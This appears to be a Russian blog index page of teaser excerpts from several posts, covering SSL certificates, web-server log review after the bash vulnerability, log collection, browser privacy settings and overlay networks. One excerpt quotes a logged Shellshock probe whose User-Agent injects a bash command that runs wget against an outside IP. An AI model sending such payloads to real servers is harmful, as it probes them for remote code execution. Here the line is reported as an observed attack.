О ssl-сертификатах
Недавно меня спросили - почему на сайте нет ssl-сертификата? На этот вопрос очень простой ответ - потому что он на нём нахер не нужен. Развёрнутый ответ под катом.
Недавно меня спросили - почему на сайте нет ssl-сертификата? На этот вопрос очень простой ответ - потому что он на нём нахер не нужен. Развёрнутый ответ под катом.
По мотивам недавней уязвимости bash'а, решил заглянуть в логи вебсервера, посмотреть как меня будут ломать.
Весь в предкушении этого драматичного зрелища отгрепал все 17мб логов за конец сентября, но нашёл только это:
::ffff:82.221.128.244 - - [30/Sep/2014:07:32:03 +1100] "GET / HTTP/1.1" 301 184 "-" "() { :;}; /bin/bash -c \x22wget http://82.221.105.197/bash-count.txt\x22"
Когда админу делать нечего - он бэкапы настраивает. Когда СОВСЕМ нечего - безопасность. © Профессиональная народная поговорка.
Итак, задача: централизованно собирать, хранить и (желательно) анализировать логи.
Дано:
Ограничения:
Утянуто с ЛОРа, дополнено своими заметками. Что требуется подкрутить в настройках самого браузера, чтобы он не стучал, аки дятел, куда попало.
Ниже перечислены свободные и открытые проекты оверлейных сетей, с кратким описанием, основыми недостатками и перспективами развития. В статье рассматриваются только сети, подходящие для потоковой передачи произвольного трафика.